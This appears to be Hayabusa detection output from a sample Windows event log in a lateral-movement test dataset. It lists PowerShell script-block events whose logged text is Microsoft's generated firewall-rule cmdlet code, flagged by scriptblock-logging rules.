[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType';,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,eter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType';,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType 
= 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' -Alias '*' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' -Alias '*' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} 
$__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' -Alias '*' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 